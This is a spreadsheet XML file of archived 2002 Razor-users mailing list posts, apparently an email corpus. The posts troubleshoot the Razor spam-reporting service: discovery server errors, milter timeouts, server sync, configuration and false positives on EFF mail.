) This sf.net email is sponsored by: Jabber - The world's fastest growing 
) real-time communications platform! Don't just IM. Build it in! 
) http://www.jabber.com/osdn/xim
) _______________________________________________
) Razor-users mailing list
) Razor-users@lists.sourceforge.net
)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
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thursday 25 July 2002 06:16 am, Kylus wrote:
&gt; Much thanks and my apologies if I come across as a jerk.It needed saying.  Thanks for stepping up.-- 
_________________________________________________
No I Don't Yahoo!
And I'm getting pretty sick of being asked if I do.
_________________________________________________
John Andersen / Juneau Alaska
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Thu, 25 Jul 2002 18:33:15 -0700 skrev du:&gt;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properly.An ordinary Forward Unquoted in Agent is subject to character set conversions
and does not depict the received spam in its original form.I hope this clarifies my concerns.- JÃ¸rgen-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
    Uh, guys?  I can't seem to find the RPMs anymore.  Does anyone else remember the URL?  
------------------------------------------------------------------------
Brian FahrlÃ¤nder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
</t>
  </si>
  <si>
    <t xml:space="preserve">As I understand it - the central database keeps a score of a reporters 
electronic "reputation". Is there any way for me to read this? I want to 
be able to tell how many messages I sent and if there were any revokes?-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">  For what you're trying to do, forwarding does not work.
  'bounce' works perfectly, if you can do that.
  Another option is to save spam to a folder and report 
  it all at once.  -chad
On 26/07/02 08:41 +0200, JÃ¸rgen Thomsen wrote:
) Thu, 25 Jul 2002 18:33:15 -0700 skrev du:
) 
) &gt;  Not sure what you're asking.
)   
) I just want to be sure, that forwarding an email to my own spamtrap address
) which performs a razor-report on the entire received email is not waste of
) time, because the contents of the forwarded email is not recognized as equal
) to the email originally received. The forwarded email has a new set of
) headerlines, which should be discarded and instead the headerlines of the
) original message are in the body of this new message and should be recognized
) as such and treated properly.
) 
) An ordinary Forward Unquoted in Agent is subject to character set conversions
) and does not depict the received spam in its original form.
) 
) I hope this clarifies my concerns.
) 
) - JÃ¸rgen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</si>
  <si>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
    I hate to ask...I've heard it mentioned several times here, but I couldn't find a digest, and the hits I found on Google turned up missing pages.  :(    I thought I was reporting spams all this time...the last month or so...but I wasn't.  I had a pathing problem going on, and a log-pathing problem, too, but hadn't noticed it yet.  Now, the system seems to be working, other than this message in the logs:    nextserver: Could not get valid info from Discovery Servers    What's the fix for this again?  Is it a server outtage, or something else?    I'm using the 2.03 sdk, and the new 2.14 agent...------------------------------------------------------------------------
Brian FahrlÃ¤nder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
</t>
  </si>
  <si>
    <t xml:space="preserve">
I see that Robert S. Wojciechowski Jr. posted about this issue on 7/26,
but I don't see any responses. I get that error when calling razor-report
from a sendmail alias, but not from the command line as a different user.
The way I solved it was to run razor-admin -createandrazor-admin -discoverwith a -home argument set to the global /etc/razor directory, which is
explicitly specified in the args to the alias pipe.The manual page, which suggests that /etc/razor/razor-agent.conf will be
loaded first, does not also say that razor-admin will then create a
.razor directory in the user's home directory if it does not exist
(although this /is/ pointed out in the razor-agents(1) page. This may
lead to some minor confusion if the user is trying to set the discovery
and other defaults for a default (e.g., /etc/razor) install. The
workaround is as I say above, namely, explicitly specify the path to
razorhome on the command line, e.g.razor-admin -home=/etc/razor -create
razor-admin -home=/etc/razor -discoverhth,
Steve-- 
hesketh.com/inc. v: (919) 834-2552 f: (919) 834-2554 w: http://hesketh.com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</si>
  <si>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With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I have
managed to get smrazor working (milter) -- sort of ... With light server
loads, it seems to do fine; however during peak traffic times (or peak
catalogue server usage???) , the smrazor milter stops and sometime dumps
core as well.  Does anyone know of a limit in terms of number of
messages/minute that can be theoretically processed? I have noticed timeouts
occuring (I set the milter timeout per message to 15 seconds) often in huge
lumps and the occasional "Could not get valid info from Discovery Servers")
?????I am not using procmail because this [cluster of] server is a gateway on to
5 different pop3 servers (5 different domains), ergo, local users won't work
because of overlapping usernames ...(or insanely huge virtusertable to alias
mappings .....)Alternatively does anyone have a working, high-capacity milter for this or
any other related ideas???Sven-------------------------------------------------------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</si>
  <si>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?????15 seconds is more than enough timeout... There's no request/minute limit,
and we are not close to hardware limits on any of the servers.Could you send me relevant sections from the log file as well as
your config?-- Vipul Ved Prakash          |   "The future is here, it's just not 
Software Design Artist     |    widely distributed."
http://vipul.net/          |              -- William Gibson-------------------------------------------------------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</si>
  <si>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 Original Message -----
From: "Vipul Ved Prakash" 
To: "Sven" 
Cc: 
Sent: Wednesday, July 31, 2002 10:31 PM
Subject: Re: [Razor-users] Smrazor, Milter, and Max connections
&gt; On Wed, Jul 31, 2002 at 09:44:08PM -0400, Sven wrote:
&gt; &gt; With v2.14 of razor client and using Solaris 9 with sendmail 8.12.5 I
have
&gt; &gt; managed to get smrazor working (milter) -- sort of ... With light server
&gt; &gt; loads, it seems to do fine; however during peak traffic times (or peak
&gt; &gt; catalogue server usage???) , the smrazor milter stops and sometime dumps
&gt; &gt; core as well.  Does anyone know of a limit in terms of number of
&gt; &gt; messages/minute that can be theoretically processed? I have noticed
timeouts
&gt; &gt; occuring (I set the milter timeout per message to 15 seconds) often in
huge
&gt; &gt; lumps and the occasional "Could not get valid info from Discovery
Servers")
&gt; &gt; ?????
&gt;
&gt; 15 seconds is more than enough timeout... There's no request/minute limit,
&gt; and we are not close to hardware limits on any of the servers.
&gt;
&gt; Could you send me relevant sections from the log file as well as
&gt; your config?
&gt;
&gt;&gt;From the maillog:
Jul 31 22:52:20 cartman sendmail[21081]: [ID 801593 mail.error]
g712pocb021081: Milter (smrazor): timeout before data read
Jul 31 22:52:20 cartman sendmail[21081]: [ID 801593 mail.info]
g712pocb021081: Milter (smrazor): to error state
Jul 31 22:52:22 cartman sendmail[21091]: [ID 801593 mail.error]
g712pocb021091: Milter (smrazor): timeout before data read
Jul 31 22:52:22 cartman sendmail[21091]: [ID 801593 mail.info]
g712pocb021091: Milter (smrazor): to error state&gt;&gt;From razor-agents.log
Jul 31 17:35:43.637025 check[21171]: [ 1] razor-check error: nextserver:
discover0: bootstrap_discovery:
Jul 31 17:35:43.987175 check[21168]: [ 1] razor-check error: nextserver:
discover0: bootstrap_discovery:
Jul 31 18:36:34.652485 check[8241]: [ 1] razor-check error: nextserver:
Could not get valid info from Discovery Servers
Jul 31 22:01:09.162201 check[9973]: [ 1] razor-check error: nextserver:
Could not get valid info from Discovery Servers&gt;&gt;From smrazor.err
[07/31/2002 22:52:22] (1144) Error reading from razor-check (156a78)
(21092): timeout
[07/31/2002 22:52:42] (1144) Error reading from razor-check (16b948)
(21221): timeout
[07/31/2002 22:52:42] (1144) Error reading from razor-check (165348)
(21227): timeout
[07/31/2002 22:57:21] (1144) Error reading from razor-check (16d118)
(22911): timeoutrazor-agent.conf
#
# Razor2 config file
#
# Autogenerated by Razor-Agents v2.14
# Wed Jul 31 11:38:43 2002
# Created with all default values
#
# see razor-agent.conf(5) man page
#debuglevel             = 3
identity               = identity
ignorelist             = 0
listfile_catalogue     = servers.catalogue.lst
listfile_discovery     = servers.discovery.lst
listfile_nomination    = servers.nomination.lst
logfile                = /var/log/razor-agent.log
min_cf                 = ac
razorhome              = /etc/razor
razorzone              = razor2.cloudmark.com
rediscovery_wait       = 172800
report_headers         = 1
turn_off_discovery     = 0
use_engines            = 1,2,3,4
whitelist              = razor-whitelistRealizing that the above, after looking at it, is pretty much no help,
changed debug to 9 and output the results to a text file. It is attached but
the crux of the messages resemble:
Jul 31 23:11:14.633544 check[5689]: [ 7] Can't read file
servers.discovery.lst, looking relatve to
Jul 31 23:11:14.634218 check[5689]: [ 5] Can't read file
/servers.discovery.lst: No such file or directory
 or
Jul 31 23:07:19.115412 check[26156]: [ 6] no discovery listfile:
servers.discovery.lst
Jul 31 23:07:19.115878 check[26156]: [ 5] Finding Discovery Servers via DNS
in the razor2.cloudmark.com zone
Jul 31 23:07:19.174862 check[26155]: [ 8] Connection established
Jul 31 23:07:19.175667 check[26155]: [ 4] 216.52.13.90 &gt;&gt; 29 server
greeting: sn=N&amp;srl=30&amp;ep4=7542-10&amp;a=l
Jul 31 23:07:19.176887 check[26155]: [ 4] 216.52.13.90 &lt;&lt; 12
Jul 31 23:07:19.177344 check[26155]: [ 6] a=g&amp;pm=csl
Jul 31 23:07:19.214020 check[26124]: [ 6] Found 1 Discovery Servers via DNS
in the razor2.cloudmark.com zone
Jul 31 23:07:19.214729 check[26124]: [ 8] Checking with Razor Discovery
Server 216.52.13.90
Jul 31 23:07:19.215383 check[26124]: [ 6] No proper port specified, using
2703
Jul 31 23:07:19.215833 check[26124]: [ 5] Connecting to 216.52.13.90 ...It would appear that even though there is a specified home directory,
razor-check cannot read the .lst files and must apparently run discovery at
each lookup?????This, btw, is occuring on two separate servers ...Sven-------------------------------------------------------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</si>
  <si>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suggestion...
as I see it, there is a valid need for a "razor-cache"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
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Good day, zenn,On Fri, 2 Aug 2002, zenn wrote:&gt; as I see it, there is a valid need for a "razor-cache" server that is
&gt; available to the local smtp host...
&gt; recursiveness would also be a nice feature, giving us the option to link
&gt; caches to offload the burden on the razor servers...
&gt; it could also allow us to setup local razor caches for private networks that
&gt; can bypass the razor servers all together...
&gt; any commensts ?	http://www.stearns.org/razor-caching-proxy/ is what you're looking 
for for the razor1 protocol.  The equivalent for razor2 is on hold pending 
documentation of the razor2 protocol.
	Jordan, is that still in the "finishing touches" stage?  *smile*  
I'm betting that the infinite demands of getting a startup going put it on 
the back burner.  Please let me know if I can help; if you need someone to 
check it over, I'd be glad to do that.
	Cheers,
	- Bill---------------------------------------------------------------------------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 Frederick Douglass, August 4, 1857
(Courtesy of Eric S. Raymond)
--------------------------------------------------------------------------
William Stearns (wstearns@pobox.com).  Mason, Buildkernel, named2hosts, 
and ipfwadm2ipchains are at:                        http://www.stearns.org
---------------------------------------------------------------------------------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi Marc,There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signature.cheers,
vipul.On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&gt; Subject: [E-IP] HP backs off DMCA threat - CNET.com
&gt; Sender: eff-ip-admin@eff.org
&gt; X-BeenThere: eff-ip@eff.org
&gt; X-Mailman-Version: 2.0.11
&gt; List-Unsubscribe: ,
&gt;          
&gt; List-Id: Intelectual Property 
&gt; List-Post: 
&gt; List-Help: 
&gt; List-Subscribe: ,
&gt;          
&gt; List-Archive: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</si>
  <si>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Hi everyone,I'm the systems admin for the Electronic Frontier Foundation and I'm using razor 
running under spam assassin there and one my own personal server. Generally it 
works fine with near 0 false positives - except - that almost all the false 
positives I've seen are on messages that originated at EFF.So - I am wondering why RAZOR is catching EFF email and how is this happening. 
Below is an example of what I'm talking about.---------------------------------Envelope-to: pcn@virtualrecordings.com
X-Sender: robin@mail.eff.org
X-Mailer: QUALCOMM Windows Eudora Version 5.1
To: eff-ip@eff.org
From: Robin Gross 
Subject: [E-IP] HP backs off DMCA threat - CNET.com
Sender: eff-ip-admin@eff.org
X-BeenThere: eff-ip@eff.org
X-Mailman-Version: 2.0.11
List-Unsubscribe: ,
List-Id: Intelectual Property 
List-Post: 
List-Help: 
List-Subscribe: ,
List-Archive: 
X-Original-Date: Fri, 02 Aug 2002 10:15:12 -0700
Date: Fri, 02 Aug 2002 10:15:12 -0700
         tests=MAILTO_LINK,RAZOR_CHECK
         version=2.40
2002/07/29 16:25:10 jmason Exp $)
   SPAM: -------------------- Start SpamAssassin results ----------------------
   SPAM: This mail is probably spam.  The original message has been altered
   SPAM: so you can recognise or block similar unwanted mail in future.
   SPAM: See http://spamassassin.org/tag/ for more details.
   SPAM:
   SPAM: Content analysis details:   (7.1 hits, 5 required)
   SPAM: MAILTO_LINK        (0.1 points)  BODY: Includes a URL link to send an 
email
   SPAM: RAZOR_CHECK        (7.0 points)  Listed in Razor, see 
http://razor.sourceforge.net/
   SPAM:
   SPAM: -------------------- End of SpamAssassin results ---------------------
X-Spam: [SPAM] - Spam Assassinhttp://news.com.com/2100-1023-947740.htmlDocument: HP backs off DMCA threatBy CNET News.com Staff
August 1, 2002, 6:10 PM PTHewlett-Packard Thursday abandoned legal threats it made against security 
analysts who publicized flaws in the company's software.In a statement released late Thursday, HP said it would not use the Digital 
Millennium Copyright Act (DMCA), a controversial copyright law, to pursue a 
loosely-organized team of researchers who demonstrated a bug in the company's 
Tru64 Unix operating system.The following is the company's statement:1) HP is committed to protecting our customer's security environments.2) We have verified that there is a security vulnerability with Tru64 UNIX, the 
details of which were brought to our attention July 18. The problem has now been 
isolated and HP has been preparing a fix, which will be available within the 
next 48 hours.3) We won't comment on the specifics of our discussions with SnoSoft. However, 
we take our customers' security requirements very seriously and have a strong 
track record following industry-standard security practices.4) Where and how the DMCA should be applied is a matter of great controversy. 
The reported letter to SnoSoft was not consistent or indicative of HP's policy. 
We can say emphatically that HP will not use the DMCA to stifle research or 
impede the flow of information that would benefit our customers and improve 
their system security.~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Robin D. Gross - Cyberspace Attorney @ Law - Intellectual Property
Director - Campaign for Audiovisual Free Expression (CAFE)
Electronic Frontier Foundation
454 Shotwell Street, San Francisco, CA 94110
e: robin@eff.org    w: http://www.eff.org
p: 415.863.5459    f: 415.436.9993
http://www.eff.org/cafe
http://www.eff.org/IP/Open_licenses
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1de'i Friday 02 August 2002 18:01 la Marc Perkel cusku di'e
&gt; Hi everyone,
&gt;
&gt; I'm the systems admin for the Electronic Frontier Foundation and I'm using
&gt; razor running under spam assassin there and one my own personal server.
&gt; Generally it works fine with near 0 false positives - except - that almost
&gt; all the false positives I've seen are on messages that originated at EFF.
&gt;
&gt; So - I am wondering why RAZOR is catching EFF email and how is this
&gt; happening. Below is an example of what I'm talking about.I added code to my procmailrc (on the other account) so that anything that 
comes on Bugtraq and is in Razor is revoked. Bugtraq is moderated, so spam 
doesn't get through it. The recipe revoked a message about an hour after I 
added it.:0 Wc
| razor-check:0 a
{
   :0
   * !^(some Bugtraq-specific header)
   !fesmri@ixazon.dynip.com   :0 E
   | razor-revoke
}cmeclax
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.0.7 (GNU/Linux)iD8DBQE9SxOd3/k1hdmG9jMRAqz2AJ4yYsmri9qP3l8c61T9SFL5yQ1y6gCeJA71
CretKENIo9OyI7HgLm112jI=
=jodf
-----END PGP SIGNATURE-----
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Bob Proulx  wrote:
To: 
Sent: Friday, August 02, 2002 9:59 PM
Subject: Re: [Razor-users] False Positives on EFF Messages
&gt; If spammers spoof a From: Bugtraq address then their
&gt; spam is automatically revoked by you.Good point, but notice that cmeclax said in his example procmail recipe:   :0
   * !^(some Bugtraq-specific header)It should be possible to pick a header that a spammer is not likely forge. He was
even careful not to reveal in public just what header(s) he is checking. -- sidney
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; 
&gt; It seems that an email consisting of a single line containg a
&gt; control-M is detected as spam. 
&gt; 
&gt; It also seems that an email consisting of 5 blank lines is also
&gt; treated as spam:Please ignore my last message. It seems that my problems results from
a homebrewn patch.  -- Michael -------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
----- Original Message ----- 
From: "Forrest English" 
To: 
Sent: Saturday, August 03, 2002 9:30 AM
Subject: [Razor-users] report automation with pine?
&gt; -----BEGIN PGP SIGNED MESSAGE-----
&gt; Hash: SHA1
&gt; 
&gt; is there currently a way to integrate razor-report into
&gt; pine?   spamassassin is killing most of the major spam, but more and more
&gt; stuff is sneaking in that is very short conscise...  and
&gt; annoying.  usually with hotmail, aol or yahoo return addresses.  i've
&gt; blacklisted *@aol.com...   but i'd rather start reporting this stuff in
&gt; the hopes that it would help someone else avoid it.
&gt; 
&gt; anyhow, if it could be done, let me know.  thanks.setup the config of pine to 
enable the enable-unix-pipe-cmd then when reading the messageenter |  razor-check 
RegardsRay Gardener&gt;-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a semi-followup on my previous question. I am running razor-check
through a sendmail milter (smrazor http://www.sapros.com/smrazor/ ) and have
set up my milter timeouts to 20sec connect and 30 sec response. The problem
is that there is another timeout setting for razor-check that I am unable to
locate. My razor-agent.log is now getting filled with :check[6149]: [ 3] Timed out (15 sec) while reading from honor.cloudmark.com.So the question is, is there a razor-agent.conf file setting to increase
this timeout value? I have this problem on 2 different servers now (as
apparently ubik.cloudmark and apt.cloudmark are refusing connections) ......Sven-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
It seems that an email consisting of a single line containg a
control-M is detected as spam. It also seems that an email consisting of 5 blank lines is also
treated as spam:efes:~% rm -f qq
efes:~% perl -e 'for($i = 0; $i &lt; 5; $i++) { print "\n"; }' &gt;&gt; qq
efes:~% razor-check -d qq &gt; /tmp/bar
efes:~% grep 'known spam' /tmp/bar
Aug 05 16:07:20.141526 check[31105]: [ 3] mail 1 is known spam.I'm running Razor-agents 2.14.These examples are based on real-life false-positives found by my
users. One of the reals emails was sent by a user which wrote the 
real contents of the email in the Subject field.I thought the newer Razor-releases avoided these problems.     -- Michael Glad, email: glad@daimi.au.dk-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">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t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 5 Aug 2002, Ray Gardener wrote:&gt; setup the config of pine to 
&gt; enable the enable-unix-pipe-cmd 
&gt; 
&gt; then when reading the message
&gt; 
&gt; enter 
&gt; 
&gt; |  razor-check 
You should also enable raw mode (ctrl-w) and delimiters (ctrl-r) before 
directing messages to the pipe. Raw mode includes the headers and 
delimiters allow several messages to be submitted.-- 
Mika Hirvonen 
  http://nightwatch.mine.nu/
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Is there a way to exclude a set of pages from the site map? For each
page in the site I also create a "printer friendly" page, and I would
like to exclude all of those form the sitemap.-- 
-----------------------------------------------------------------------
| Alan K. Jackson            | To see a World in a Grain of Sand      |
| alan@ajackson.org          | And a Heaven in a Wild Flower,         |
| www.ajackson.org           | Hold Infinity in the palm of your hand |
| Houston, Texas             | And Eternity in an hour. - Blake       |
-----------------------------------------------------------------------
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
webmake-talk mailing list
webmake-talk@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">I'm still seeing this.  It reports to honor.cloudmark.com but checks
against apt.cloudmark.com.  What is the sync delay between these boxes?-----Original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</si>
  <si>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If I specify -rs on razor-check and point to honor then it checks fine.
Also if I point to apt to report then I get an authentication error so
is there something wrong with that box?-----Original Message-----
From: Rose, Bobby 
Sent: Tuesday, August 06, 2002 6:54 PM
To: ML-razor-users
Subject: RE: [Razor-users] What's wrong with the Razor servers now?
I'm still seeing this.  It reports to honor.cloudmark.com but checks
against apt.cloudmark.com.  What is the sync delay between these boxes?-----Original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</si>
  <si>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For the past 2 days, nothing that I'm reporting seems to be in the
database.  If I report something, and the check the response is coming
back as none spam.  Is anyone else seeing this?
-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,We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false-positives.cheers,
vipul.On Tue, Aug 06, 2002 at 06:54:04PM -0400, Rose, Bobby wrote:
&gt; I'm still seeing this.  It reports to honor.cloudmark.com but checks
&gt; against apt.cloudmark.com.  What is the sync delay between these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turn
&gt; around and run a check on the exact same message that was reported, then
&gt; it doesn't find the sig and as such isn't spam.
&gt; 
&gt; 
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by:ThinkGeek
&gt; Welcome to geek heaven.
&gt; http://thinkgeek.com/sf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</si>
  <si>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Marc,The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again.cheers,
vipul.On Fri, Aug 02, 2002 at 03:22:13PM -0700, Marc Perkel wrote:
&gt; Thanks - but it almost looks like someone is deliberately trying to
&gt; poison EFF messages. If this is so I want to look into it. It's odd that
&gt; most all the razor errors were people talking about free speech issies
&gt; and intellectual property. It make me wonder if someone is doing
&gt; something on purpose.
&gt;
&gt; I am also active in the development of Spam Assassin rules. Spam
&gt; filtering has been a hot topic at EFF for quite some time and is even
&gt; hotter now that I'm actually using it. For what it's worth - your system
&gt; is considered to be the cleanest method - but with any system, people at
&gt; EFF are concerned about free speech issues and that spam filtering can
&gt; become a censorship issue. One of our newsletters got flagged as spam
&gt; because it had list removal instructions at the bottom.
--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</si>
  <si>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It's still doing it.  I reported a message as spam 10 minutes ago and
the check keeps coming back false.  What's funny is that message that
I'm testing with it the sample-spam.txt message from SpamAssassin and I
know it's been reported before.-----Original Message-----
From: Vipul Ved Prakash [mailto:mail@vipul.net] 
Sent: Wednesday, August 07, 2002 3:45 AM
To: Rose, Bobby
Cc: ML-razor-users
Subject: Re: [Razor-users] What's wrong with the Razor servers now?
Hi,We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false-positives.cheers,
vipul.On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</si>
  <si>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The problem is clearly because the info isn't syncing between the
servers.  If I run the check against honor which is where it was
reported then the check is positive.  If I run the check against apt or
fire, it's negative.-----Original Message-----
From: Rose, Bobby 
Sent: Wednesday, August 07, 2002 9:05 AM
To: mail@vipul.net
Cc: ML-razor-users
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before.-----Original Message-----
From: Vipul Ved Prakash [mailto:mail@vipul.net] 
Sent: Wednesday, August 07, 2002 3:45 AM
To: Rose, Bobby
Cc: ML-razor-users
Subject: Re: [Razor-users] What's wrong with the Razor servers now?
Hi,We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false-positives.cheers,
vipul.On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</si>
  <si>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except that the server doesn't know you are the same person that reported
the spam, since the identity isn't checked (at least not required, so i
assume it's not checked) when doing a razor-check
--
Daniel Higgins
Administrateur SystÃ¨me
Netcommunications Inc.
----- Original Message -----
From: "Tabor J. Wells" 
To: "Daniel Higgins" 
Cc: ; "ML-razor-users" 
Sent: Wednesday, August 07, 2002 10:39 AM
Subject: Re: [Razor-users] What's wrong with the Razor servers now?
&gt; On Wed, Aug 07, 2002 at 10:22:13AM -0400,
&gt; Daniel Higgins  is thought to have said:
&gt;
&gt; &gt; maybe i'm wrong, but it could be that your trust isn't high enough to
flag a
&gt; &gt; single message as spam?
&gt;
&gt; It would seem to make sense that regardless of your TeS value, the
&gt; signatures you report should always come back as spam when you check them
&gt; since you should always be able to trust yourself. :)
&gt;
&gt; --
&gt; --------------------------------------------------------------------
&gt; Tabor J. Wells                                razor-users@fsckit.net
&gt; Fsck It!                 Just another victim of the ambient morality
&gt;
&gt;
&gt; -------------------------------------------------------
&gt; This sf.net email is sponsored by:ThinkGeek
&gt; Welcome to geek heaven.
&gt; http://thinkgeek.com/sf
&gt; _______________________________________________
&gt; Razor-users mailing list
&gt; Razor-users@lists.sourceforge.net
&gt; https://lists.sourceforge.net/lists/listinfo/razor-users
&gt;-------------------------------------------------------
This sf.net email is sponsored by:ThinkGeek
Welcome to geek heaven.
http://thinkgeek.com/sf
_______________________________________________
Razor-users mailing list
Razor-users@lists.sourceforge.net
https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
Oh yeh one more thing.  None of this would explain why the signatures
for sample-spam.txt from spamassassin is registered on honor but not apt
or fire.-----Original Message-----
From: Rose, Bobby 
Sent: Thursday, August 08, 2002 9:54 AM
To: mail@vipul.net; razor-users@example.sourceforge.net
Subject: RE: [Razor-users] What's wrong with the Razor servers now?
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user).apt/fire sync with honor every 5 minutes, so you'd have to wait for a
_maximum_ of 5 minutes before signatures propagate.cheers,
vipul.
On Wed, Aug 07, 2002 at 11:51:21PM -0400, Rose, Bobby wrote:
&gt; This is still happening.  Nothing that I report is being registered at&gt;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did&gt; find that sample-spam.txt from Spamassassin is only registered on
&gt; honor.cloudmark.net and comes back positive from it and it only so 
&gt; it's clearly not sync'd with apt or fire.
&gt; 
&gt; 
&gt; 
&gt; -----Original Message-----
&gt; From: Rose, Bobby
&gt; Sent: Wednesday, August 07, 2002 1:32 PM
&gt; To: Patrick
&gt; Cc: ML-razor-users
&gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
&gt; 
&gt; 
&gt; I'm sure others have thought of that.  Probably the only way to
&gt; prevent that is to include the host in the report/revoke 
&gt; authentication.
&gt; 
&gt; -----Original Message-----
&gt; From: Patrick [mailto:patrick@stealthgeeks.net]
&gt; Sent: Wednesday, August 07, 2002 12:33 PM
&gt; To: Rose, Bobby
&gt; Cc: ML-razor-users
&gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
&gt; 
&gt; 
&gt; On Wed, 7 Aug 2002, Rose, Bobby wrote:
&gt; 
&gt; &gt; Well at least it's been confirmed. I can say for cetain that it
&gt; &gt; started on Monday since that was when I noticed a huge drop in stats
&gt; of messages
&gt; &gt; that were tagged as being in razor.   And I know it was fine on
&gt; Friday.
&gt; &gt; It may have something to do with the upgrades on the servers that
&gt; &gt; Vipul mentioned.  If TES is going to decide on what gets registered 
&gt; &gt; and what doesn't then razor-report should provide some debug info 
&gt; &gt; about the refusal.  You are correct about the need for more info on 
&gt; &gt; TES, but it probably won't happen for fear of circumvention.
&gt; 
&gt; 
&gt; 
&gt; On the way into work I thought of some fairly easy ways to circumvent
&gt; what I imagine the current trust model to be based on individual users&gt; blindly submitting reports and checking results.
&gt; 
&gt; It's hard to imagine others haven't as well, as I'm not too bright.
&gt; 
&gt; 
&gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
&gt; /\
&gt; /\/\/\
&gt;                                Patrick Greenwell
&gt;          Asking the wrong questions is the leading cause of wrong 
&gt; answers
&gt;
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
&gt; \/\/\/
&gt;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</si>
  <si>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I concur, but just ignore the razor errors during the make test of
spamassassin.  That recently started failing but appears just to be the
test failing.  -----Original Message-----
From: Justin Mason [mailto:yyyy@spamassassin.taint.org] 
Sent: Thursday, August 08, 2002 9:07 AM
To: Michael Graff
Cc: razor-users@example.sourceforge.net
Subject: Re: [Razor-users] New to razor Michael Graff said:&gt; I'm trying to get spamassassin 2.31 and razor (latest) to play 
&gt; together.  From what I see, this isn't likely to happen trivially,Mike -- use the CVS version of SpamAssassin.  it works well and supports
Razor 2.--j.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</si>
  <si>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user).apt/fire sync with honor every 5 minutes, so you'd have to wait for a
_maximum_ of 5 minutes before signatures propagate.cheers,
vipul.
On Wed, Aug 07, 2002 at 11:51:21PM -0400, Rose, Bobby wrote:
